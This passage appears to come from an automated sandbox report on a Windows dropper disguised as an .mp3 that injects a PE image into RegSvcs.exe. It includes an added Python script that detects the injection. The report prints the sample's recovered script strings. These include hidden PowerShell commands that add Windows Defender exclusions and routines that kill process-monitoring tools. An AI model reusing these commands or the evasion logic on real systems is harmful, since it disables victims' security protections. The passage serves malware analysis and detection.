                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05561277 mov eax, dword ptr fs:[00000030h] 14_2_05561277
                Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03280283 mov eax, dword ptr fs:[00000030h] 15_3_03280283
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB5078 mov eax, dword ptr fs:[00000030h] 16_2_00DB5078
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066C7A45 mov eax, dword ptr fs:[00000030h] 17_2_066C7A45
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066CA22E mov eax, dword ptr fs:[00000030h] 17_2_066CA22E
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066CA28B mov eax, dword ptr fs:[00000030h] 17_2_066CA28B
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B32CE0 GetProcessHeap,0_2_00B32CE0
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B26878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B26878
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B2AAC4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B2AAC4
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B26A0B SetUnhandledExceptionFilter,0_2_00B26A0B
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B25BBF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B25BBF
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003A29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_003A29B2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00390BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00390BCF
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00390D65 SetUnhandledExceptionFilter,7_2_00390D65
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00390FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00390FB1
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DC29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00DC29B2
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00DB0BCF
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB0D65 SetUnhandledExceptionFilter,16_2_00DB0D65
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00DB0FB1
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: 14.2.RegSvcs.exe.310c174.2.raw.unpack, Flutter.cs Reference to suspicious API methods: VirtualAlloc(IntPtr.Zero, new IntPtr(65536), MEM_COMMIT, 4u)
                Source: 14.2.RegSvcs.exe.310c174.2.raw.unpack, Flutter.cs Reference to suspicious API methods: Marshal.WriteIntPtr(new IntPtr(intPtr.ToInt64() + num), GetProcAddress(moduleHandle, array[i]))
                Source: 14.2.RegSvcs.exe.310c174.2.raw.unpack, Flutter.cs Reference to suspicious API methods: VirtualProtect(intPtr, 65536u, 64u, out var _)
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 990000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BB0000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 700000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 990000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BB0000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 700000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 990000
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 782000
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FC5000
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BB0000
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 8CD000
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 700000
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 44A000
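The allocation and write rows above only become an injection verdict when read together: the same injector (the AutoIt-compiled qwlvpmrupf.mp3 or its copy under AppData\Roaming\wlnk) reserves an executable region in RegSvcs.exe and then writes bytes beginning 4D5A, the MZ header, at the same base. The following Python is an added example, not code from Joe Sandbox or from the sample: it correlates rows in that shape and also flags the 922337203685477 ms "Thread delayed" values seen earlier in this section, which equal the largest timeout the NT kernel accepts (0x7FFFFFFFFFFFFFFF in 100 ns units, roughly 29,000 years), i.e. an effectively indefinite wait rather than a tuned sleep. The row texts are re-typed from the report; the regexes, function names and the constructed row list are this example's own.

```python
import re
from collections import defaultdict

# Largest timeout the NT kernel accepts (0x7FFFFFFFFFFFFFFF in 100 ns units), in
# milliseconds. A sandbox that converts the raw timeout reports an effectively
# indefinite wait as exactly this number, which is the value in the rows above.
INFINITE_WAIT_MS = (2**63 - 1) // 10_000  # 922337203685477

ALLOC_RE = re.compile(r"^Source: (?P<src>.+?) Memory allocated: (?P<dst>.+?) "
                      r"base: (?P<base>[0-9A-Fa-f]+) protect: (?P<prot>.+)$")
WRITE_RE = re.compile(r"^Source: (?P<src>.+?) Memory written: (?P<dst>.+?) "
                      r"base: (?P<base>[0-9A-Fa-f]+)(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$")
DELAY_RE = re.compile(r"^Source: (?P<src>.+?) Thread delayed: delay time: (?P<ms>\d+)$")

# Constructed input: the report's rows re-typed in plain text (one space between the
# source column and the observation). The self-allocation row at the end names no
# target process and must not be treated as injection.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 990000 protect: page execute and read and write",
    r"Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 protect: page execute and read and write",
    r"Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 990000 value starts with: 4D5A",
    r"Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 value starts with: 4D5A",
    r"Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 990000",
    r"Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 782000",
    r"Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Memory allocated: page read and write | page guard",
]


def triage(rows):
    """Correlate foreign allocations with writes at the same base and flag
    indefinite waits. Returns (injections, infinite_waits)."""
    allocs = {}                  # (injector, target, base) -> protection string
    writes = defaultdict(list)   # (injector, target, base) -> [leading bytes as hex, ...]
    delays = []
    for row in rows:
        row = row.strip()
        if m := ALLOC_RE.match(row):
            allocs[(m["src"], m["dst"], m["base"].upper())] = m["prot"]
        elif m := WRITE_RE.match(row):
            writes[(m["src"], m["dst"], m["base"].upper())].append((m["magic"] or "").upper())
        elif m := DELAY_RE.match(row):
            delays.append((m["src"], int(m["ms"])))

    injections = []
    for key, prot in allocs.items():
        magics = writes.get(key, [])
        # An executable region in a foreign process plus a write that begins with the
        # MZ magic at the same base is the signature of a PE image being mapped into
        # that process by hand (the "Injects a PE file into a foreign process" verdict).
        if "execute" in prot and any(mg.startswith("4D5A") for mg in magics):
            injector, target, base = key
            injections.append({"injector": injector, "target": target, "base": base,
                               "writes": len(magics),
                               "verdict": "PE image written into executable region of foreign process"})
    infinite_waits = [(src, ms) for src, ms in delays if ms >= INFINITE_WAIT_MS]
    return injections, infinite_waits


if __name__ == "__main__":
    found, waits = triage(SAMPLE_ROWS)
    for f in found:
        print(f"{f['injector']} -> {f['target']} @ {f['base']}: {f['verdict']} ({f['writes']} writes)")
    for src, ms in waits:
        print(f"{src}: delay {ms} ms is the maximal NT timeout, treat as an indefinite wait")
```

The write at base 782000 with no MZ magic is kept separate on purpose: it is a write into the same target but not a PE image, and the report itself does not say what it is, so the example reports only what the rows support.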
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003D1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,7_2_003D1A91
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00373312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,7_2_00373312
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for $objantivirusproduct in $colitems
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $usb = $objantivirusproduct.displayname
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: next
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return $usb
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc ;==>antivirus
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func disabler()
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;if antivirus() = "windows defender" then
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;#requireadmin
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " -command add-mppreference -exclusionpath " & @scriptdir, "", "", @sw_hide)
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide)
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;endif
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc ;==>disabler
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func antianalysis()
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("process explorer") then
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winclose("process explorer")
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("procexp64.exe")
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("procexp.exe")
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("process hacker") then
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winclose("process hacker")
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("processhacker.exe")
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if processexists("taskmgr.exe") then
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("taskmgr.exe")
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if processexists("regshot.exe") then
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: setup=rmxb.vbe
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tempmode
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: silent=1
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\local\temp\rarsfx0|
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\local\temp\rarsfx0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;";,;7;?;c;i;m;s;];g;q;|;memstr_008fdcc7-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <"<,<6<@<k<s<w<]<a<g<q<{<memstr_9e4646d3-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ="=&=,=0=6=@=j=t=_=g=k=q=u={=memstr_af200e4f-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >#>.>6>:>@>d>j>t>^>h>s>{>memstr_2785f33c-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?#?-?7?b?j?n?t?x?^?h?r?|?memstr_2064e8d5-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0#0'0-070a0k0v0^0b0h0l0r0|0memstr_1249b801-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1%1-11171;1a1k1u1_1j1r1v1|1memstr_d8e327c9-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2$2.292a2e2k2o2u2_2i2s2~2memstr_71aec8ea-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3$3.383b3m3u3y3_3c3i3s3}3memstr_ef9397f6-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4$4(4.42484b4l4v4a4i4m4s4w4}4memstr_305e74d6-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5%50585<5b5f5l5v5`5j5u5}5memstr_e7bad43a-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6%6/696d6l6p6v6z6`6j6t6~6memstr_bbe7d86e-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7%7)7/797c7m7x7`7d7j7n7t7~7memstr_7037bc67-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8'8/83898=8c8m8w8a8l8t8x8~8memstr_46f19e29-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9&909;9c9g9m9q9w9a9k9u9memstr_eab55a96-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: : :&:0:::d:o:w:[:a:e:k:u:memstr_ef1e29fb-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;&;*;0;4;:;d;n;x;c;k;o;u;y;memstr_955b38e1-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <'<2<:<><d<h<n<x<b<l<w<memstr_d8c279bc-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ='=1=;=f=n=r=x=\=b=l=v=memstr_763a7227-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >!>'>+>1>;>e>o>z>b>f>l>p>v>memstr_a810140d-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?)?1?5?;???e?o?y?c?n?v?z?memstr_84d3b348-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0(020=0e0i0o0s0y0c0m0w0memstr_40b55d42-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1"1(121<1f1q1y1]1c1g1m1w1memstr_a8237a83-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2 2(2,22262<2f2p2z2e2m2q2w2{2memstr_f0476285-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3)343<3@3f3j3p3z3d3n3y3memstr_6b1956a4-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4)434=4h4p4t4z4^4d4n4x4memstr_53dbfb5c-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5#5)5-535=5g5q5\5d5h5n5r5x5memstr_2d4b09c9-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6 6+63676=6a6g6q6[6e6p6x6|6memstr_c760d88c-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7 7*747?7g7k7q7u7[7e7o7y7memstr_67d24a94-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8 8$8*848>8h8s8[8_8e8i8o8y8memstr_812f6908-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9"9*9.94989>9h9r9\9g9o9s9y9}9memstr_dc011d11-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :!:+:6:>:b:h:l:r:\:f:p:{:memstr_5792d373-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;!;+;5;?;j;r;v;\;`;f;p;z;memstr_173daed4-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <!<%<+</<5<?<i<s<^<f<j<p<t<z<memstr_3f42bde2-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ="=-=5=9=?=c=i=s=]=g=r=z=~=memstr_1508cd50-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >">,>6>a>i>m>s>w>]>g>q>{>memstr_008a1a6f-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?"?&?,?6?@?j?u?]?a?g?k?q?{?memstr_46c9c109-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0$0,00060:0@0j0t0^0i0q0u0{0memstr_ae0c5c89-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1#1-181@1d1j1n1t1^1h1r1}1memstr_93520cc5-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2#2-272a2l2t2x2^2b2h2r2|2memstr_8f84a185-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3#3'3-31373a3k3u3`3h3l3r3v3|3memstr_595341ca-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4$4/474;4a4e4k4u4_4i4t4|4memstr_892bcde6-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5$5.585c5k5o5u5y5_5i5s5}5memstr_11ddfb28-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6$6(6.686b6l6w6_6c6i6m6s6}6memstr_266ba5aa-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7&7.72787<7b7l7v7`7k7s7w7}7memstr_73a1ca37-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8%8/8:8b8f8l8p8v8`8j8t8memstr_902807b1-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9%9/999c9n9v9z9`9d9j9t9~9memstr_5e1ceeb8-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :%:):/:3:9:c:m:w:b:j:n:t:x:~:memstr_4ff0eace-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;&;1;9;=;c;g;m;w;a;k;v;~;memstr_c13434fd-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <&<0<:<e<m<q<w<[<a<k<u<memstr_514b4e21-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: = =&=*=0=:=d=n=y=a=e=k=o=u=memstr_2a25c7c7-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >(>0>4>:>>>d>n>x>b>m>u>y>memstr_a896c27c-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?'?1?<?d?h?n?r?x?b?l?v?memstr_028502d2-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0!0'010;0e0p0x0\0b0f0l0v0memstr_78362a12-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1'1+11151;1e1o1y1d1l1p1v1z1memstr_d8fed597-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2(232;2?2e2i2o2y2c2m2x2memstr_8ab03aba-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3(323<3g3o3s3y3]3c3m3w3memstr_cacefe5f-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4"4(4,424<4f4p4[4c4g4m4q4w4memstr_21a07d00-d
